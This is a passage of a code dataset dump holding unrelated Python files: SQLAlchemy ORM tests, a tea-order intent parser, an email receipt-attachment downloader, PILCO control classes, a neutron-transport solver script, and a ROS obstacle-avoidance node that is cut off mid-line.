noqa: F821\n viewonly=True\n )\n bs_set: Mapped[Set[B]] = relationship(viewonly=True) # noqa: F821\n bs_list_warg: Mapped[List[B]] = relationship( # noqa: F821\n \"B\", viewonly=True\n )\n bs_set_warg: Mapped[Set[B]] = relationship( # noqa: F821\n \"B\", viewonly=True\n )\n\n b_one_to_one: Mapped[B] = relationship(viewonly=True) # noqa: F821\n\n b_one_to_one_warg: Mapped[B] = relationship( # noqa: F821\n \"B\", viewonly=True\n )\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n a: Mapped[A] = relationship(viewonly=True)\n a_warg: Mapped[A] = relationship(\"A\", viewonly=True)\n\n is_(A.__mapper__.attrs[\"bs_list\"].collection_class, list)\n is_(A.__mapper__.attrs[\"bs_set\"].collection_class, set)\n is_(A.__mapper__.attrs[\"bs_list_warg\"].collection_class, list)\n is_(A.__mapper__.attrs[\"bs_set_warg\"].collection_class, set)\n is_true(A.__mapper__.attrs[\"bs_list\"].uselist)\n is_true(A.__mapper__.attrs[\"bs_set\"].uselist)\n is_true(A.__mapper__.attrs[\"bs_list_warg\"].uselist)\n is_true(A.__mapper__.attrs[\"bs_set_warg\"].uselist)\n\n is_false(A.__mapper__.attrs[\"b_one_to_one\"].uselist)\n is_false(A.__mapper__.attrs[\"b_one_to_one_warg\"].uselist)\n\n is_false(B.__mapper__.attrs[\"a\"].uselist)\n is_false(B.__mapper__.attrs[\"a_warg\"].uselist)\n\n def test_collection_class_dict_attr_mapped_collection_literal_annotations(\n self, decl_base\n ):\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n bs: Mapped[KeyFuncDict[str, B]] = relationship( # noqa: F821\n collection_class=attribute_keyed_dict(\"name\")\n )\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n name: Mapped[str] = mapped_column()\n\n self._assert_dict(A, B)\n\n def test_collection_cls_attr_mapped_collection_dbl_literal_annotations(\n self, decl_base\n ):\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n bs: Mapped[KeyFuncDict[str, \"B\"]] = relationship( # noqa: F821\n collection_class=attribute_keyed_dict(\"name\")\n )\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n name: Mapped[str] = mapped_column()\n\n self._assert_dict(A, B)\n\n def test_collection_cls_not_locatable(self, decl_base):\n class MyCollection(KeyFuncDict):\n pass\n\n with expect_raises_message(\n exc.ArgumentError,\n r\"Could not interpret annotation Mapped\\[MyCollection\\['B'\\]\\].\",\n ):\n\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n bs: Mapped[MyCollection[\"B\"]] = relationship( # noqa: F821\n collection_class=attribute_keyed_dict(\"name\")\n )\n\n def test_collection_cls_one_arg(self, decl_base):\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n bs: Mapped[MappedOneArg[\"B\"]] = relationship( # noqa: F821\n collection_class=attribute_keyed_dict(\"name\")\n )\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n 
name: Mapped[str] = mapped_column()\n\n self._assert_dict(A, B)\n\n def _assert_dict(self, A, B):\n A.registry.configure()\n\n a1 = A()\n b1 = B(name=\"foo\")\n\n # collection appender on MappedCollection\n a1.bs.set(b1)\n\n is_(a1.bs[\"foo\"], b1)\n\n def test_14_style_anno_accepted_w_allow_unmapped(self):\n \"\"\"test for #8692\"\"\"\n\n class Base(DeclarativeBase):\n __allow_unmapped__ = True\n\n class A(Base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: str = Column(String)\n bs: List[B] = relationship(\"B\", back_populates=\"a\")\n\n class B(Base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n data: Mapped[str]\n a: A = relationship(\"A\", back_populates=\"bs\")\n\n Base.registry.configure()\n\n self.assert_compile(\n select(A).join(A.bs),\n \"SELECT a.id, a.data FROM a JOIN b ON a.id = b.a_id\",\n )\n\n @testing.combinations(\n (\"not_optional\",),\n (\"optional\",),\n (\"optional_fwd_ref\",),\n (\"union_none\",),\n (\"pep604\", testing.requires.python310),\n argnames=\"optional_on_m2o\",\n )\n def test_basic_bidirectional(self, decl_base, optional_on_m2o):\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n bs: Mapped[List[\"B\"]] = relationship( # noqa: F821\n back_populates=\"a\"\n )\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n if optional_on_m2o == \"optional\":\n a: Mapped[Optional[\"A\"]] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n elif optional_on_m2o == \"optional_fwd_ref\":\n a: Mapped[\"Optional[A]\"] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n elif optional_on_m2o == \"union_none\":\n a: Mapped[Union[A, None]] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n elif optional_on_m2o == \"pep604\":\n a: Mapped[A | None] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n else:\n a: Mapped[\"A\"] = relationship(\n back_populates=\"bs\", primaryjoin=a_id == A.id\n )\n\n a1 = A(data=\"data\")\n b1 = B()\n a1.bs.append(b1)\n is_(a1, b1.a)\n\n @testing.combinations(\n \"include_relationship\",\n \"no_relationship\",\n argnames=\"include_relationship\",\n )\n @testing.combinations(\n \"direct_name\", \"indirect_name\", argnames=\"indirect_name\"\n )\n def test_indirect_name_collection(\n self, decl_base, include_relationship, indirect_name\n ):\n \"\"\"test #8759\"\"\"\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n global B_\n B_ = B\n\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n if indirect_name == \"indirect_name\":\n if include_relationship == \"include_relationship\":\n bs: Mapped[List[B_]] = relationship(\"B\")\n else:\n bs: Mapped[List[B_]] = relationship()\n else:\n if include_relationship == \"include_relationship\":\n bs: Mapped[List[B]] = relationship(\"B\")\n else:\n bs: Mapped[List[B]] = relationship()\n\n self.assert_compile(\n select(A).join(A.bs),\n \"SELECT a.id, a.data FROM a JOIN b ON a.id = b.a_id\",\n )\n\n @testing.combinations(\n \"include_relationship\",\n \"no_relationship\",\n 
argnames=\"include_relationship\",\n )\n @testing.combinations(\n \"direct_name\", \"indirect_name\", argnames=\"indirect_name\"\n )\n def test_indirect_name_scalar(\n self, decl_base, include_relationship, indirect_name\n ):\n \"\"\"test #8759\"\"\"\n\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n global A_\n A_ = A\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n if indirect_name == \"indirect_name\":\n if include_relationship == \"include_relationship\":\n a: Mapped[A_] = relationship(\"A\")\n else:\n a: Mapped[A_] = relationship()\n else:\n if include_relationship == \"include_relationship\":\n a: Mapped[A] = relationship(\"A\")\n else:\n a: Mapped[A] = relationship()\n\n self.assert_compile(\n select(B).join(B.a),\n \"SELECT b.id, b.a_id FROM b JOIN a ON a.id = b.a_id\",\n )\n\n def test_indirect_name_relationship_arg_override(self, decl_base):\n \"\"\"test #8759\n\n in this test we assume a case where the type for the Mapped annnotation\n a. has to be a different name than the actual class name and\n b. cannot be imported outside of TYPE CHECKING. user will then put\n the real name inside of relationship(). we have to succeed even though\n we can't resolve the annotation.\n\n \"\"\"\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(Integer, primary_key=True)\n a_id: Mapped[int] = mapped_column(ForeignKey(\"a.id\"))\n\n if TYPE_CHECKING:\n BNonExistent = B\n\n class A(decl_base):\n __tablename__ = \"a\"\n\n id: Mapped[int] = mapped_column(primary_key=True)\n data: Mapped[str] = mapped_column()\n\n bs: Mapped[List[BNonExistent]] = relationship(\"B\")\n\n self.assert_compile(\n select(A).join(A.bs),\n \"SELECT a.id, a.data FROM a JOIN b ON a.id = b.a_id\",\n )\n\n\nclass WriteOnlyRelationshipTest(_WriteOnlyRelationshipTest):\n def test_dynamic(self, decl_base):\n class A(decl_base):\n __tablename__ = \"a\"\n id: Mapped[int] = mapped_column(primary_key=True)\n bs: DynamicMapped[B] = relationship()\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(primary_key=True)\n a_id: Mapped[int] = mapped_column(\n ForeignKey(\"a.id\", ondelete=\"cascade\")\n )\n\n self._assertions(A, B, \"dynamic\")\n\n def test_write_only(self, decl_base):\n class A(decl_base):\n __tablename__ = \"a\"\n id: Mapped[int] = mapped_column(primary_key=True)\n bs: WriteOnlyMapped[B] = relationship() # noqa: F821\n\n class B(decl_base):\n __tablename__ = \"b\"\n id: Mapped[int] = mapped_column(primary_key=True)\n a_id: Mapped[int] = mapped_column(\n ForeignKey(\"a.id\", ondelete=\"cascade\")\n )\n\n self._assertions(A, B, \"write_only\")\n","sub_path":"test/orm/declarative/test_tm_future_annotations.py","file_name":"test_tm_future_annotations.py","file_ext":"py","file_size_in_byte":20831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"361553191","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\n\"\"\"\n Loki module for item\n\n Input:\n inputSTR str,\n utterance str,\n args str[],\n resultDICT dict\n\n Output:\n resultDICT dict\n\"\"\"\n\nDEBUG_item = True\nuserDefinedDICT = {\"hot\": [\"常溫\", \"溫飲\", \"熱飲\", \"燙\"], \"ice\": [\"冰\", \"正常冰\", \"少冰\", \"微冰\", \"去冰\", \"不要冰塊\", \"溫\", \"熱\", \"常溫\", \"溫飲\", \"熱飲\", \"不要加冰塊\", \"不加冰塊\", \"不加冰\", \"不要冰\"], \"size\": [\"大\", \"中\"], 
\"sugar\": [\"無糖\", \"微糖\", \"半糖\", \"少糖\", \"全糖\", \"正常糖\", \"零分糖\", \"二分糖\", \"五分糖\", \"八分糖\", \"0分糖\", \"2分糖\", \"5分糖\", \"8分糖\", \"零分\", \"二分\", \"五分\", \"八分\", \"0分\", \"2分\", \"5分\", \"8分\", \"不要糖\", \"不要加糖\", \"不加糖\", \"糖\"], \"原鄉四季\": [\"四季\", \"四季春\", \"原鄉\", \"四季茶\", \"四季春茶\", \"原鄉茶\", \"原鄉四季茶\", \"原鄉四季春茶\", \"原四季春茶\", \"四季元鄉\"], \"極品菁茶\": [\"極品菁\", \"菁茶\", \"極菁\", \"極菁茶\"], \"烏龍綠茶\": [\"烏龍\", \"烏龍綠\", \"烏\"], \"特級綠茶\": [\"綠茶\", \"綠\", \"特綠\"], \"特選普洱\": [\"特選普洱茶\", \"普洱\", \"普洱茶\", \"特普\", \"特級普洱茶\", \"特級普洱\"], \"翡翠烏龍\": [\"翡翠烏\", \"翡翠烏龍茶\", \"翡翠烏茶\", \"翡翠烏龍綠\", \"翡翠烏綠\", \"翠烏\", \"翠烏茶\", \"翡烏\", \"翡烏茶\", \"烏龍\"], \"錫蘭紅茶\": [\"錫蘭\", \"錫蘭紅\", \"紅茶\", \"錫茶\", \"蘭茶\", \"紅\"], \"嚴選高山茶\": [\"高山\", \"高山茶\", \"嚴選高山\", \"嚴選高\"]}\n\nitemLIST = userDefinedDICT[\"烏龍綠茶\"] + userDefinedDICT[\"錫蘭紅茶\"] + userDefinedDICT[\"特級綠茶\"] + userDefinedDICT[\"極品菁茶\"] + userDefinedDICT[\"原鄉四季\"] + userDefinedDICT[\"特選普洱\"] + userDefinedDICT[\"翡翠烏龍\"] + userDefinedDICT[\"嚴選高山茶\"]\nitemLIST = itemLIST + [\"烏龍綠茶\", \"特級綠茶\", \"錫蘭紅茶\", \"極品菁茶\", \"原鄉四季\", \"特選普洱\", \"翡翠烏龍\", \"嚴選高山茶\"]\n\n# 將符合句型的參數列表印出。這是 debug 或是開發用的。\ndef debugInfo(inputSTR, utterance):\n if DEBUG_item:\n print(\"[item] {} ===> {}\".format(inputSTR, utterance))\n\ndef getResult(inputSTR, utterance, args, resultDICT):\n debugInfo(inputSTR, utterance)\n resultDICT[\"item\"] = []\n resultDICT[\"amount\"] = []\n \n if utterance == \"[一杯][大][冰][綠][半糖][少冰]\":\n if args[3] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[3] in userDefinedDICT[k]: \n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0])\n elif args[3] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0]) \n\n if utterance == \"[我]要[菁茶][半糖][不要冰塊]\":\n if args[1] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[1] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[1] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n if utterance == \"[普洱]微微\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n\n if utterance == \"[特選普洱][不要加糖]跟[冰]塊\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n\n if utterance == \"[錫蘭紅茶][大]杯\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n\n if utterance == \"[錫蘭紅茶][大]杯[少糖][少冰]\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n\n if utterance == \"[一杯][錫蘭紅茶]和[烏龍綠茶]\":\n for a in args[1:3]:\n if a in itemLIST:\n for k in userDefinedDICT.keys():\n if a in userDefinedDICT[k]: \n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0])\n elif a == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0]) \n\n if utterance == 
\"[兩杯][熱]的[錫蘭紅茶],[甜度][冰]塊[正常]\":\n if args[2] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[2] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0])\n elif args[2] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[0]) \n\n if utterance == \"[原鄉][兩杯][一杯][半糖][少冰][一杯][全糖][正常冰]\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[1])\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(args[1]) \n\n if utterance == \"冰[紅茶][不要冰]\":\n if args[0] in itemLIST:\n for k in userDefinedDICT.keys():\n if args[0] in userDefinedDICT[k]:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\")\n elif args[0] == k:\n resultDICT[\"item\"].append(k)\n resultDICT[\"amount\"].append(\"1\") \n\n\n return resultDICT","sub_path":"intent/Loki_item.py","file_name":"Loki_item.py","file_ext":"py","file_size_in_byte":6957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"313869066","text":"import imaplib, smtplib, email, os\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n\n\nto_addr = []\n\ndef sendMail(TO, SUBJECT, text):\n TEXT = 'Subject: {}\\n\\n{}'.format(SUBJECT, text)\n FROM = 'example@yandex.ru'\n\n body = MIMEMultipart()\n body['From'] = FROM\n body['To'] = TO\n body['Subject'] = SUBJECT\n body.attach(MIMEText(text, 'plain'))\n\n server = smtplib.SMTP_SSL('smtp.yandex.ru')\n server.login('example@yandex.ru', 'Password')\n server.sendmail(FROM, [TO], body.as_string())\n\n\ndef parse_from_addr(s):\n result = list(email.utils.parseaddr(s))\n return result[1]\n\n\ndef decode_header(header):\n parts = []\n for part in email.header.decode_header(header):\n header_string, charset = part\n if charset:\n decoded_part = header_string.decode(charset)\n else:\n decoded_part = header_string\n parts.append(decoded_part)\n return \"\".join(parts)\n\n\ndef getMessage():\n mail = imaplib.IMAP4_SSL('imap.yandex.ru') # данные сервера\n mail.login('example@yandex.ru', 'Password') # логин на почту\n mail.list() # список папок ящика\n mail.select('inbox') # выбираем папку входящие\n result, data = mail.search(None, 'UNSEEN') # UNSEEN\n # собираем письма в список и обрабатываем\n for num in data[0].split():\n result, data = mail.fetch(num, '(RFC822)')\n email_message = email.message_from_bytes(data[0][1])\n # чекаем на наличие вложений\n if email_message.get_content_maintype() != 'multipart':\n print('content maintype != multipart')\n name = parse_from_addr(email_message['From'])\n if name not in to_addr:\n to_addr.append(name)\n mail.store(num, '+FLAGS', '\\\\Deleted')\n continue\n mail.store(num, '+FLAGS', '\\\\Seen')\n yield email_message\n\n\nif __name__ == '__main__':\n counter = 1\n print('Поехали!')\n for msg in getMessage():\n for part in msg.walk():\n if part.get_content_type() == 'application/pdf' or 'image/png' \\\n or 'image/gif' or 'image/jpeg' or 'application/msword':\n\n if part.get('Content-Disposition') is None:\n continue\n\n detach_dir = \"F:\\\\KVIT\\\\\"\n\n if not os.path.isdir(detach_dir):\n os.makedirs(detach_dir)\n continue\n\n filename = decode_header(part.get_filename())\n '''\n # if there is no filename, we create one with a counter to avoid duplicates\n if not filename:\n filename = 'part-%03d%s' % (counter, 'bin')\n counter += 1'''\n\n att_path = 
os.path.join(detach_dir, filename)\n\n # Check if its already there\n if not os.path.isfile(att_path):\n # finally write the stuff\n fp = open(att_path, 'wb')\n fp.write(part.get_payload(decode=True))\n fp.close()\n\n else:\n print('non standart file format')\n name = parse_from_addr(msg['From'])\n if name not in to_addr:\n to_addr.append(name)\n print('Еще немного....')\n for name in to_addr:\n print(name)\n sendMail(name, 'An error occurred while sending receipts',\n 'Please send the file in one of the following formats: pdf, png, jpeg, gif, doc (MS Office Word document).')\n\n print('Готово!')\n","sub_path":"mail_kvit.py","file_name":"mail_kvit.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"264701944","text":"import tensorflow as tf\nimport numpy as np\nimport gpflow\n\nfrom .models import MGPR\nfrom gpflow import settings\nfloat_type = settings.dtypes.float_type\n\ndef squash_sin(m, s, e=None):\n '''\n Squashing function, passing the controls mean and variance\n through a sinus, as in gSin.m.\n '''\n k = tf.shape(m)[1]\n if e is None:\n e = tf.ones((1,k), dtype=float_type) #squashes in [-1,1] by default\n else:\n e = e * tf.ones((1,k), dtype=float_type)\n mu = e*tf.exp(-tf.diag_part(s) / 2) * tf.sin(m)\n\n lq = -(tf.reshape(tf.diag_part(s), shape=[k, 1])\n + tf.reshape(tf.diag_part(s), shape=[1, k])) / 2\n q = tf.exp(lq)\n su = (tf.exp(lq + s) - q) * tf.cos(tf.reshape(m, shape=[k, 1])\n - tf.reshape(m, shape=[1, k])) \\\n - (tf.exp(lq - s) - q) * tf.cos(tf.reshape(m, shape=[k, 1])\n + tf.reshape(m, shape=[1, k]))\n su = tf.reshape(e, shape=[1, k]) * tf.reshape(e, shape=[k, 1]) * su / 2\n #C = tf.diag( tf.transpose(e) @ tf.exp(-tf.diag_part(s)/2) * tf.cos(m))\n C = e*tf.diag( tf.exp(-tf.diag_part(s)/2) * tf.cos(m))\n return mu, su, tf.reshape(C,shape=[k,k])\n\n\nclass LinearController(gpflow.Parameterized):\n def __init__(self, state_dim, control_dim, W=None, b=None, e=None):\n gpflow.Parameterized.__init__(self)\n self.W = gpflow.Param(np.random.rand(control_dim, state_dim))\n self.b = gpflow.Param(np.random.rand(1, control_dim))\n self.e = e\n\n @gpflow.params_as_tensors\n def compute_action(self, m, s, squash=True):\n '''\n Simple affine action: M <- W(m-t) - b\n IN: mean (m) and variance (s) of the state\n OUT: mean (M) and variance (S) of the action\n '''\n M = m @ tf.transpose(self.W) + self.b # mean output\n S = self.W @ s @ tf.transpose(self.W) # output variance\n V = tf.transpose(self.W) #input output covariance\n if squash:\n M, S, V2 = squash_sin(M, S, self.e)\n V = V @ V2\n return M, S, V\n\n\nclass FakeGPR(gpflow.Parameterized):\n def __init__(self, X, Y, kernel):\n gpflow.Parameterized.__init__(self)\n self.X = gpflow.Param(X)\n self.Y = gpflow.Param(Y)\n self.kern = kernel\n self.likelihood = gpflow.likelihoods.Gaussian()\n\nclass RbfController(MGPR):\n '''\n An RBF Controller implemented as a deterministic GP\n See Deisenroth et al 2015: Gaussian Processes for Data-Efficient Learning in Robotics and Control\n Section 5.3.2.\n '''\n def __init__(self, state_dim, control_dim, num_basis_functions, e=None):\n MGPR.__init__(self,\n np.random.rand(num_basis_functions, state_dim),\n np.random.rand(num_basis_functions, control_dim)\n )\n for model in self.models:\n model.kern.variance = 1.0\n model.kern.variance.trainable = False\n self.e = e\n\n def create_models(self, X, Y):\n self.models = gpflow.params.ParamList([])\n for i in range(self.num_outputs):\n kern = 
gpflow.kernels.RBF(input_dim=X.shape[1], ARD=True)\n            self.models.append(FakeGPR(X, Y[:, i:i+1], kern))\n\n    def compute_action(self, m, s, squash=True):\n        '''\n        RBF Controller. See Deisenroth's Thesis Section 5.3.2.\n        IN: mean (m) and variance (s) of the state\n        OUT: mean (M) and variance (S) of the action\n        '''\n        iK, beta = self.calculate_factorizations()\n        M, S, V = self.predict_given_factorizations(m, s, 0.0*iK, beta)\n        S = S - tf.diag(self.variance - 1e-6)\n        if squash:\n            M, S, V2 = squash_sin(M, S, self.e)\n            V = V @ V2\n        return M, S, V\n","sub_path":"pilco/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"196039697","text":"import os\n\nfrom jproperties import Properties\n\nfrom util import Logger\n\npath = os.getcwd()\n\n# build the config path portably (the original string relied on unescaped backslashes)\npath = os.path.join(path, \"resources\", \"config\", \"configuration.properties\")\n\n\ndef getconfigdata(propertyname):\n    log = Logger.getlogger()\n    try:\n        configs = Properties()\n        with open(path, 'rb') as config_file:\n            configs.load(config_file)\n\n        return configs.get(propertyname).data\n    except Exception as e:\n        log.exception(\"Exception Occurred\", exc_info=True)\n","sub_path":"util/PropertyManager.py","file_name":"PropertyManager.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"536725707","text":"#Alicia M. Elliott, 22.212 Fall 2017\n#Method of Characteristics solver\n#2D pincell, fixed isotropic source in fuel\n\nfrom initializetracks import InitializeTracks\nfrom flux import FlatSourceRegion, MethodOfCharacteristics, ConvergenceTest\nfrom math import pi\n\n\n###################################\n########## PROBLEM SETUP ##########\n###################################\n\nnum_azim = 16 #number of azimuthal angles desired\nt = 0.05 #track spacing desired, cm\nh = 1.26 #height of pincell\nw = 1.26 #width of pincell\nr = 0.4 #fuel pin radius\nn_p = 3 #number of polar divisions; can be 2 or 3\nnum_iter_max = 100 #maximum number of iterations on flux\ntol = 1e-7 #tolerance for convergence (using L2 Engineering Norm)\n\n#########################################\n########## MATERIAL PROPERTIES ##########\n#########################################\n\nq_fuel = 10/4*pi #constant isotropic source in fuel\nq_mod = 0 #no source in moderator\nndensity_fuel = 2.2e22 #atoms/cc (UO2)\nndensity_mod = 1.0e21 #at/cc (H2O)\nsigma_a = 1e-24 #moderator absorption cross section (cm^2)\nsigma_r = (11.4 + 8)* 1e-24 #fuel absorption cross section (cm^2)\n\n\n#######################################\n########## CHOOSE TEST CASES ##########\n#######################################\n\ntest_sourcexsconst = False\ntest_qpropto = False\ntest_dancoff = True\n\n\n################################################\n########## MACROSCOPIC CROSS SECTIONS ##########\n################################################\n\nsigma_t_fuel = 1e4 #sigma_r * ndensity_fuel\nsigma_t_mod = 1 #sigma_a * ndensity_mod\n\n\n####################################\n########## RUN TEST CASES ##########\n####################################\ncheck = ConvergenceTest()\n\nif test_sourcexsconst:\n    q_mod, sigma_t_mod = check.sourceXSConstTest(q_fuel, sigma_t_fuel)\n\nif test_qpropto:\n    q_fuel, q_mod = check.sourceProptoXSTest(sigma_t_fuel, sigma_t_mod)\n\nif test_dancoff:\n    q_fuel, q_mod, sigma_t_fuel = check.dancoffFactor(q_fuel)\n\n###############################################\n########## SETUP FLAT SOURCE REGIONS ##########\n###############################################\n\nfuel = FlatSourceRegion(q_fuel, sigma_t_fuel)\nmod = FlatSourceRegion(q_mod, sigma_t_mod)\nfsr = [fuel, mod]\n\n#####################################\n########## GENERATE TRACKS ##########\n#####################################\n\nsetup = InitializeTracks(num_azim, t, w, h, n_p, r, fsr)\nsetup.getTrackParams()\nsetup.makeTracks()\nsetup.getAngularQuadrature()\nsetup.getPolarWeight()\nsetup.findIntersection()\nsetup.reflectRays()\nsetup.getFSRVolumes(fuel, mod)\n#setup.getTrackLinkCoords()\n\n##############################\n########## PLOTTING ##########\n##############################\n\nsetup.plotTracks()\n#setup.plotTrackLinking()\n#setup.plotSegments()\n\n######################################\n########## SOLVE FOR FLUXES ##########\n######################################\n\nflux = MethodOfCharacteristics(sigma_t_fuel, sigma_t_mod, fsr, setup, check)\nflux.solveFlux(num_iter_max, tol)\n\n","sub_path":"MOCSolver/submission/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"337461741","text":"#!/usr/bin/python\n#encoding: UTF8\n\nimport rospy, time, datetime\nfrom geometry_msgs.msg import Twist\nfrom ubo_pkg.srv import *\nfrom std_msgs.msg import UInt8,UInt64,UInt64MultiArray,Float32MultiArray\nfrom ubo_pkg.msg import MotorMsg\nfrom random import randrange\n\n# Default acceleration\nACCELERATION \t=\t1\n\n# Default speed in m/s\nVITESSEMAX \t\t=\t0.5\nROTATION\t\t= \t0.25\n\n# Number of rotations in the same direction\nMAXROTATION = 20\n\n# sensor indices\nUS_BACKLEFTB\t\t= 0\nUS_BACKLEFTU\t\t= 1\nUS_SIDELEFT\t\t\t= 2\nUS_FRONTLEFT\t\t= 3\nUS_FRONTRIGHT\t\t= 4\nUS_SIDERIGHT\t\t= 5\nUS_BACKRIGHTU\t\t= 6\nUS_BACKRIGHTB\t\t= 7\nIR_RIGHT\t\t\t= 8\nIR_LEFT\t\t\t\t= 9\n\n# Sensor limit values\nMAXIR\t\t\t\t= 2.0\n\nMINUSFRONT\t\t\t= 40\t# in centimeters\nMINUSSIDE\t\t\t= 20\t# in centimeters\n\nSPEEDRATE\t\t\t= 200.0\t# Speed regulation ratio of speed vs. sensor distance:\n\t\t\t\t\t\t\t# divide the minimum distance to the sensor in cm by this value\n\t\t\t\t\t\t\t# max 300 / 300.0 = 1.0 m/s\n\nclass Robot_route:\n\n\tdef __init__(self):\n\n\t\tself.cmdvel = rospy.Publisher(\"cmd_vel\", Twist, queue_size=10)\n\t\tself.cmdstop = rospy.Publisher(\"cmd_stop\", UInt8, queue_size=10)\n\t\tself.route = rospy.Publisher(\"route\", Twist, queue_size=10)\n\n\t\tself.motor_state = False\n\t\trospy.Subscriber(\"motor_state\", MotorMsg, self.on_state, queue_size=10)\n\n\t\tself.proximity = [0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]\n\t\trospy.Subscriber(\"proximity\", Float32MultiArray, self.on_proximity, queue_size=10)\n\n\t\tself.count = MAXROTATION\n\t\tself.rand = 0\n\t\tself.vitesse = 0\t\t# keeps track of the last commanded speed\n\n\n\tdef on_proximity(self, msg):\n\t\tfor x in range(0,10):\n\t\t\tself.proximity[x]=msg.data[x]\n\t\tstop = False\n\t\t# Stop if there is an obstacle\n\t\tif self.vitesse != 0:\n\t\t\tif self.vitesse > 0 and 